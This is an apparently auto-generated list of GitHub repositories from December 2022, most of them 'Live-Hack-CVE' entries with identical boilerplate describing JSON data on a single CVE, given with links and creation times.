**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35022 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35022](https://github.com/Live-Hack-CVE/CVE-2022-35022) create time: 2022-12-25T17:52:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35021 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35021](https://github.com/Live-Hack-CVE/CVE-2022-35021) create time: 2022-12-25T17:52:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39821 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39821](https://github.com/Live-Hack-CVE/CVE-2022-39821) create time: 2022-12-25T17:52:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39819 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39819](https://github.com/Live-Hack-CVE/CVE-2022-39819) create time: 2022-12-25T17:51:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39816](https://github.com/Live-Hack-CVE/CVE-2022-39816) create time: 2022-12-25T17:51:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39815 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39815](https://github.com/Live-Hack-CVE/CVE-2022-39815) create time: 2022-12-25T17:51:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39208 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39208](https://github.com/Live-Hack-CVE/CVE-2022-39208) create time: 2022-12-25T17:51:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37709 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37709](https://github.com/Live-Hack-CVE/CVE-2022-37709) create time: 2022-12-25T17:51:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3255 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3255](https://github.com/Live-Hack-CVE/CVE-2022-3255) create time: 2022-12-25T17:50:32Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20148 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20148](https://github.com/Live-Hack-CVE/CVE-2017-20148) create time: 2022-12-25T17:09:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-20147 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-20147](https://github.com/Live-Hack-CVE/CVE-2017-20147) create time: 2022-12-25T17:09:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19058 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19058](https://github.com/Live-Hack-CVE/CVE-2018-19058) create time: 2022-12-25T17:09:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-20650 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-20650](https://github.com/Live-Hack-CVE/CVE-2018-20650) create time: 2022-12-25T17:09:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-18897 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-18897](https://github.com/Live-Hack-CVE/CVE-2018-18897) create time: 2022-12-25T17:09:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9903 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9903](https://github.com/Live-Hack-CVE/CVE-2019-9903) create time: 2022-12-25T17:09:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-9959 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-9959](https://github.com/Live-Hack-CVE/CVE-2019-9959) create time: 2022-12-25T17:08:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2773 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2773](https://github.com/Live-Hack-CVE/CVE-2020-2773) create time: 2022-12-25T17:09:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-2781 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-2781](https://github.com/Live-Hack-CVE/CVE-2020-2781) create time: 2022-12-25T17:09:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36604 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36604](https://github.com/Live-Hack-CVE/CVE-2020-36604) create time: 2022-12-25T17:06:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25426 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25426](https://github.com/Live-Hack-CVE/CVE-2021-25426) create time: 2022-12-25T17:13:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25448 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25448](https://github.com/Live-Hack-CVE/CVE-2021-25448) create time: 2022-12-25T17:13:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25447](https://github.com/Live-Hack-CVE/CVE-2021-25447) create time: 2022-12-25T17:13:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25446 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25446](https://github.com/Live-Hack-CVE/CVE-2021-25446) create time: 2022-12-25T17:13:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25459 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25459](https://github.com/Live-Hack-CVE/CVE-2021-25459) create time: 2022-12-25T17:13:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25453 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25453](https://github.com/Live-Hack-CVE/CVE-2021-25453) create time: 2022-12-25T17:13:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25378 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25378](https://github.com/Live-Hack-CVE/CVE-2021-25378) create time: 2022-12-25T17:13:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25387 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25387](https://github.com/Live-Hack-CVE/CVE-2021-25387) create time: 2022-12-25T17:13:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25386 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25386](https://github.com/Live-Hack-CVE/CVE-2021-25386) create time: 2022-12-25T17:12:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25385 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25385](https://github.com/Live-Hack-CVE/CVE-2021-25385) create time: 2022-12-25T17:12:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25383 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25383](https://github.com/Live-Hack-CVE/CVE-2021-25383) create time: 2022-12-25T17:12:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25340 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25340](https://github.com/Live-Hack-CVE/CVE-2021-25340) create time: 2022-12-25T17:12:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25351 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25351](https://github.com/Live-Hack-CVE/CVE-2021-25351) create time: 2022-12-25T17:12:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25366 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25366](https://github.com/Live-Hack-CVE/CVE-2021-25366) create time: 2022-12-25T17:12:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25361 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25361](https://github.com/Live-Hack-CVE/CVE-2021-25361) create time: 2022-12-25T17:12:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25360 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25360](https://github.com/Live-Hack-CVE/CVE-2021-25360) create time: 2022-12-25T17:12:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25464](https://github.com/Live-Hack-CVE/CVE-2021-25464) create time: 2022-12-25T17:12:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25489 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25489](https://github.com/Live-Hack-CVE/CVE-2021-25489) create time: 2022-12-25T17:12:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25518 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25518](https://github.com/Live-Hack-CVE/CVE-2021-25518) create time: 2022-12-25T17:12:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25472 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25472](https://github.com/Live-Hack-CVE/CVE-2021-25472) create time: 2022-12-25T17:12:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41803 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41803](https://github.com/Live-Hack-CVE/CVE-2021-41803) create time: 2022-12-25T17:10:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-27774 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-27774](https://github.com/Live-Hack-CVE/CVE-2021-27774) create time: 2022-12-25T17:09:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-39190 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-39190](https://github.com/Live-Hack-CVE/CVE-2021-39190) create time: 2022-12-25T17:08:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-3782 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-3782](https://github.com/Live-Hack-CVE/CVE-2021-3782) create time: 2022-12-25T17:03:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40932 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40932](https://github.com/Live-Hack-CVE/CVE-2022-40932) create time: 2022-12-25T17:13:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-24280 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-24280](https://github.com/Live-Hack-CVE/CVE-2022-24280) create time: 2022-12-25T17:11:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-27492 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-27492](https://github.com/Live-Hack-CVE/CVE-2022-27492) create time: 2022-12-25T17:11:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36798 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36798](https://github.com/Live-Hack-CVE/CVE-2022-36798) create time: 2022-12-25T17:11:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38703 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38703](https://github.com/Live-Hack-CVE/CVE-2022-38703) create time: 2022-12-25T17:11:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3144 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3144](https://github.com/Live-Hack-CVE/CVE-2022-3144) create time: 2022-12-25T17:11:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37328 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37328](https://github.com/Live-Hack-CVE/CVE-2022-37328) create time: 2022-12-25T17:11:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40193 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40193](https://github.com/Live-Hack-CVE/CVE-2022-40193) create time: 2022-12-25T17:11:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40195](https://github.com/Live-Hack-CVE/CVE-2022-40195) create time: 2022-12-25T17:11:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36791 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36791](https://github.com/Live-Hack-CVE/CVE-2022-36791) create time: 2022-12-25T17:11:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36388 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36388](https://github.com/Live-Hack-CVE/CVE-2022-36388) create time: 2022-12-25T17:11:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35238](https://github.com/Live-Hack-CVE/CVE-2022-35238) create time: 2022-12-25T17:11:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40869 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40869](https://github.com/Live-Hack-CVE/CVE-2022-40869) create time: 2022-12-25T17:10:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40865](https://github.com/Live-Hack-CVE/CVE-2022-40865) create time: 2022-12-25T17:10:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40864](https://github.com/Live-Hack-CVE/CVE-2022-40864) create time: 2022-12-25T17:10:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40862](https://github.com/Live-Hack-CVE/CVE-2022-40862) create time: 2022-12-25T17:10:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40853 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40853](https://github.com/Live-Hack-CVE/CVE-2022-40853) create time: 2022-12-25T17:10:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40860 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40860](https://github.com/Live-Hack-CVE/CVE-2022-40860) create time: 2022-12-25T17:10:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40851](https://github.com/Live-Hack-CVE/CVE-2022-40851) create time: 2022-12-25T17:10:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37232](https://github.com/Live-Hack-CVE/CVE-2022-37232) create time: 2022-12-25T17:10:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40298 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40298](https://github.com/Live-Hack-CVE/CVE-2022-40298) create time: 2022-12-25T17:10:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38573 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38573](https://github.com/Live-Hack-CVE/CVE-2022-38573) create time: 2022-12-25T17:09:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36934 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36934](https://github.com/Live-Hack-CVE/CVE-2022-36934) create time: 2022-12-25T17:09:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31937 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31937](https://github.com/Live-Hack-CVE/CVE-2022-31937) create time: 2022-12-25T17:09:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23458 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23458](https://github.com/Live-Hack-CVE/CVE-2022-23458) create time: 2022-12-25T17:09:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34026 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34026](https://github.com/Live-Hack-CVE/CVE-2022-34026) create time: 2022-12-25T17:09:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40705 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40705](https://github.com/Live-Hack-CVE/CVE-2022-40705) create time: 2022-12-25T17:09:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40250 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40250](https://github.com/Live-Hack-CVE/CVE-2022-40250) create time: 2022-12-25T17:09:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37235 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37235](https://github.com/Live-Hack-CVE/CVE-2022-37235) create time: 2022-12-25T17:09:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41218](https://github.com/Live-Hack-CVE/CVE-2022-41218) create time: 2022-12-25T17:09:27Z

**no description** : [wjlin0/CVE-2022-26134](https://github.com/wjlin0/CVE-2022-26134) create time: 2022-12-25T15:29:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41992](https://github.com/Live-Hack-CVE/CVE-2022-41992) create time: 2022-12-25T12:54:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4556 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4556](https://github.com/Live-Hack-CVE/CVE-2022-4556) create time: 2022-12-25T12:54:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-4558 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-4558](https://github.com/Live-Hack-CVE/CVE-2022-4558) create time: 2022-12-25T12:54:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23488 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23488](https://github.com/Live-Hack-CVE/CVE-2022-23488) create time: 2022-12-25T12:54:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47516 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47516](https://github.com/Live-Hack-CVE/CVE-2022-47516) create time: 2022-12-25T12:54:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-47517 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-47517](https://github.com/Live-Hack-CVE/CVE-2022-47517) create time: 2022-12-25T12:54:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-23531 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-23531](https://github.com/Live-Hack-CVE/CVE-2022-23531) create time: 2022-12-25T12:53:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-6931 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-6931](https://github.com/Live-Hack-CVE/CVE-2016-6931) create time: 2022-12-25T12:20:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2016-4278 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2016-4278](https://github.com/Live-Hack-CVE/CVE-2016-4278) create time: 2022-12-25T12:19:53Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-1000367 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-1000367](https://github.com/Live-Hack-CVE/CVE-2017-1000367) create time: 2022-12-25T11:34:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-18288 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-18288](https://github.com/Live-Hack-CVE/CVE-2018-18288) create time: 2022-12-25T12:20:08Z

